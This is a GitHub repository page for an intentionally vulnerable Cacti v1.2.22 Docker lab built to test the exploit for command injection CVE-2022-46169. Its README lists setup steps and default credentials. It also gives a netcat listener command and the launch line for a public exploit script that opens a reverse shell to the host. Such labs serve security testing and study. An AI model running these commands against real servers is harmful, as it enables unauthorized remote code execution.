Skip to content

m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits

config

config

 
 

exploit

exploit

 
 

Dockerfile_cacti

Dockerfile_cacti

 
 

Dockerfile_mysql

Dockerfile_mysql

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

docker-compose.yml

docker-compose.yml

 
 

Repository files navigation

Cacti v1.2.22 command injection (CVE-2022-46169) vulnerable application

This is a vulnerable application to test the exploit for the Cacti vulnerability (CVE-2022-46169).

WARNING!

This application contains serious security vulnerabilities. Run it at your own risk! It is recommended using a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet facing servers, as they will be compromised.

DISCLAIMER: I do not take responsibility for the way in which any one uses this application. The only purpose of this application is to be a test scenario for the CVE-2022-46169 exploit and it should not be used maliciously. If your server is compromised via an installation of this application it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.

Vulnerability info

  • CVE-ID: CVE-2022-46169
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • Description: In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

Usage

Here the steps to setup the environment:

  1. Launch docker compose up -d to start composition.
  2. You can finalize the steps by browsing to http://127.0.0.1/cacti to start the Cacti initialization wizard. If you get an error referring to the database, just wait a little bit and refresh the page.
  3. Default credentials are admin/admin.
  4. Press "Next" to all the buttons during the wizard, choosing options accordingly. All the defaults should be fine and all the mandatory prerequisites should be satisfied.
  5. After the installation, you have to setup a new graph:
    1. Click on "Create graphs".
    2. Under "Graph Templates" section, in the dropdown menù near "Create", select: "Device - Uptime".
    3. Press "Create" button.

The container will be called vuln-cacti.

To teardown the environment use docker compose down command.

The official installation guide of Cacti can be found here.

Root cause

A detailed root cause of the vulnerability is available here.

Exploit

A public exploit is available on Exploit-DB. It has been copied under the exploit/ folder for simplicity.

To run it:

  1. Use netcat on the host machine to listen for incoming connections. 
    nc -lvp 6669
  2. Launch the exploit. 
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    Tip: host.docker.internal is used to reach the host machine from the container (reference).

There is also an entry in vulhub repository.

Authors

  • Antonio Francesco Sardella - implementation - m3ssap0

License

This project is licensed under the Unlicense - see the LICENSE file for details.

Acknowledgments

About

WARNING: This is a vulnerable application to test the exploit for the Cacti command injection (CVE-2022-46169). Run it at your own risk!

Topics

rce cacti vulnerable-application command-injection cve-2022-46169

Resources

Readme

License

Unlicense license
Activity

Stars

1 star

Watchers

1 watching

Forks

2 forks
Report repository

Languages